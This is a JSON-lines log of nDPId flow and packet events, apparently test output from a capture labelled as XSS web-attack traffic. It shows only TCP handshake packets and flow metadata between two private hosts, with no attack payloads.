+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7240,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":2,"flow_last_seen":1499347837373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347837373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgcDH48pN0KD1uaAScSA8OQAAAgQFtAQCCAoD5gqwATw5PAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7241,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":3,"flow_last_seen":1499347837374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347837374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zIVAAD4G+VKsEAABwKgKMoHAAFDQoPW5x+PKToAQAOXbQAAAAQEICgE8OTwD5gqw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347838675,"flow_last_seen":1499347838675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347838675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1499347838675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347838675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8apJAAD4GWz6sEAABwKgKMoHOAFDGglATAAAAAKACchCKkgAAAgQFtAQCCAoBPDqBAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":2,"flow_last_seen":1499347838675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347838675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgc48YB01xoJQFKAScSAiAAAAAgQFtAQCCAoD5gv2ATw6gQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":3,"flow_last_seen":1499347838676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347838676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0apNAAD4GW0WsEAABwKgKMoHOAFDGglAUPGAdNoAQAOXBBgAAAQEICgE8OoID5gv2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347841229,"flow_last_seen":1499347841229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347841229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1499347841229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347841229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86g5AAD4G28GsEAABwKgKMoHoAFBN49cOAAAAAKACchB5nQAAAgQFtAQCCAoBPD0AAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7270,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":2,"flow_last_seen":1499347841229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347841229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgejkRPOpTePXD6AScSCQMwAAAgQFtAQCCAoD5g50ATw9AAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7271,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":3,"flow_last_seen":1499347841230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347841230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06g9AAD4G28isEAABwKgKMoHoAFBN49cP5ETzqoAQAOUvOwAAAQEICgE8PQAD5g50"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347842491,"flow_last_seen":1499347842491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347842491,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1499347842491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347842491,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lUdAAD4GMImsEAABwKgKMoH2AFCtqqt8AAAAAKACchBEHwAAAgQFtAQCCAoBPD47AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":2,"flow_last_seen":1499347842491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347842491,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgfYhjECLraqrfaAScSDPUAAAAgQFtAQCCAoD5g+wATw+OwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":3,"flow_last_seen":1499347842492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347842492,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lUhAAD4GMJCsEAABwKgKMoH2AFCtqqt9IYxAjIAQAOVuVwAAAQEICgE8PjwD5g+w"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7302,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347845077,"flow_last_seen":1499347845077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347845077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7302,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1499347845077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347845077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83IxAAD4G6UOsEAABwKgKMoIQAFCGLpxOAAAAAKACchB4KAAAAgQFtAQCCAoBPEDCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7303,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":2,"flow_last_seen":1499347845077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347845077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQghDt+J+Thi6cT6AScSDVXgAAAgQFtAQCCAoD5hI2ATxAwgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":3,"flow_last_seen":1499347845078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347845078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03I1AAD4G6UqsEAABwKgKMoIQAFCGLpxP7fiflIAQAOV0ZgAAAQEICgE8QMID5hI2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347846345,"flow_last_seen":1499347846345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347846345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1499347846345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347846345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NftAAD4Gj9WsEAABwKgKMoIeAFCnQ3QEAAAAAKACchB+EgAAAgQFtAQCCAoBPEH\/AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7312,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":2,"flow_last_seen":1499347846345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347846345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgh6m5yHpp0N0BaAScSCexwAAAgQFtAQCCAoD5hNzATxB\/wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7313,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":3,"flow_last_seen":1499347846345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347846345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NfxAAD4Gj9ysEAABwKgKMoIeAFCnQ3QFpuch6oAQAOU9zwAAAQEICgE8Qf8D5hNz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7323,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347847629,"flow_last_seen":1499347847629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347847629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7323,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1499347847629,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347847629,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TMtAAD4GeQWsEAABwKgKMoIsAFDM8A+LAAAAAKACchC7jwAAAgQFtAQCCAoBPENAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":2,"flow_last_seen":1499347847629,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347847629,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgizINJmdzPAPjKAScSBCAgAAAgQFtAQCCAoD5hS0ATxDQAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7326,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":3,"flow_last_seen":1499347847630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347847630,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TMxAAD4GeQysEAABwKgKMoIsAFDM8A+MyDSZnoAQAOXhCQAAAQEICgE8Q0AD5hS0"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347850209,"flow_last_seen":1499347850209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347850209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1499347850209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347850209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OS9AAD4GjKGsEAABwKgKMoJGAFCA5HzqAAAAAKACchCXnQAAAgQFtAQCCAoBPEXFAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":2,"flow_last_seen":1499347850209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347850209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgkZb8bIlgOR866AScSBvRgAAAgQFtAQCCAoD5hc5ATxFxQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":3,"flow_last_seen":1499347850210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347850210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OTBAAD4GjKisEAABwKgKMoJGAFCA5HzrW\/GyJoAQAOUOTgAAAQEICgE8RcUD5hc5"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347851476,"flow_last_seen":1499347851476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347851476,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1499347851476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347851476,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d+RAAD4GTeysEAABwKgKMoJUAFCuljDmAAAAAKACchC0pAAAAgQFtAQCCAoBPEcCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":2,"flow_last_seen":1499347851476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347851476,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQglT2+WNtrpYw56AScSA+wAAAAgQFtAQCCAoD5hh2ATxHAgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":3,"flow_last_seen":1499347851476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347851476,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d+VAAD4GTfOsEAABwKgKMoJUAFCuljDn9vljboAQAOXdxwAAAQEICgE8RwID5hh2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347852742,"flow_last_seen":1499347852742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347852742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 